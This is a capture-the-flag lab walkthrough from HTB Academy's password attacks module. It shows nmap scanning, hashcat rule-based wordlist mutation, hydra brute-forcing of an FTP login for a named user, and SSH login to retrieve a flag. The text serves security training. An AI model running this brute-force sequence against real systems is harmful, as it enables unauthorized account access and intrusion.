HTB Academy: Password Attacks Module – Password Mutations Section

This content originally appeared on DEV Community and was authored by maz4l

Task

Create a mutated wordlist using the files in the ZIP file under "Resources." Use this wordlist to brute-force the password for the user "sam." Once successful, log in via SSH and submit the flag from flag.txt.

Steps:

• Run Nmap Scan Identify open ports and services on the target machine:

   nmap -sV -Pn <$target_ip>

Example output:

   PORT    STATE SERVICE     VERSION
   21/tcp  open  ftp         vsftpd 3.0.3
   22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
   139/tcp open  netbios-ssn Samba smbd 4.6.2
   445/tcp open  netbios-ssn Samba smbd 4.6.2

• Create Password List and Custom Rule Using the files provided in the "Resources" section, create the password.list and custom.rule:

   sudo nano password.list
   sudo nano custom.rule

• Generate Mutated Wordlist Use Hashcat to generate a mutated wordlist:

   hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

• Filter Mutated Wordlist Edit the mutated wordlist to filter passwords with a length of 11 or more characters:

   sed -n '/^[[:alnum:][:punct:]]\{11,\}$/p' mut_password.list

• Brute Force with Hydra Use Hydra to find the password for the user "sam" on the FTP service:

   hydra -l sam -P mut_password.list ftp://<$target_ip> -t 48 -v

Example successful output:

   [21][ftp] host: 10.129.x.xxx   login: sam   password: B@t********

• Log in via SSH Connect to the target machine using the found credentials:

   ssh sam@<$target_ip>
   password: B@t********

• Find and Retrieve the Flag Search for the flag file and read its contents:

   find / -name "flag.txt" 2>/dev/null

Example:

   /home/sam/smb/flag.txt
   cat /home/sam/smb/flag.txt

The flag is:

   HTB{P4**_*********}

This task demonstrated how to use password mutation rules to generate a custom wordlist and perform a brute-force attack to retrieve the flag.

Happy Hacking!

This content originally appeared on DEV Community and was authored by maz4l

Print Share Comment Cite Upload Translate Updates

APA

maz4l | Sciencx (2024-08-18T08:26:23+00:00) HTB Academy: Password Attacks Module – Password Mutations Section. Retrieved from https://www.scien.cx/2024/08/18/htb-academy-password-attacks-module-password-mutations-section/

MLA

" » HTB Academy: Password Attacks Module – Password Mutations Section." maz4l | Sciencx - Sunday August 18, 2024, https://www.scien.cx/2024/08/18/htb-academy-password-attacks-module-password-mutations-section/

HARVARD

maz4l | Sciencx Sunday August 18, 2024 » HTB Academy: Password Attacks Module – Password Mutations Section., viewed ,<https://www.scien.cx/2024/08/18/htb-academy-password-attacks-module-password-mutations-section/>

VANCOUVER

maz4l | Sciencx - » HTB Academy: Password Attacks Module – Password Mutations Section. [Internet]. [Accessed ]. Available from: https://www.scien.cx/2024/08/18/htb-academy-password-attacks-module-password-mutations-section/

CHICAGO

" » HTB Academy: Password Attacks Module – Password Mutations Section." maz4l | Sciencx - Accessed . https://www.scien.cx/2024/08/18/htb-academy-password-attacks-module-password-mutations-section/

IEEE

" » HTB Academy: Password Attacks Module – Password Mutations Section." maz4l | Sciencx [Online]. Available: https://www.scien.cx/2024/08/18/htb-academy-password-attacks-module-password-mutations-section/. [Accessed: ]

rf:citation

» HTB Academy: Password Attacks Module – Password Mutations Section | maz4l | Sciencx | https://www.scien.cx/2024/08/18/htb-academy-password-attacks-module-password-mutations-section/ |

Please log in to upload a file.

There are no updates yet.
Click the Upload button above to add an update.

You must be logged in to translate posts. Please log in or register.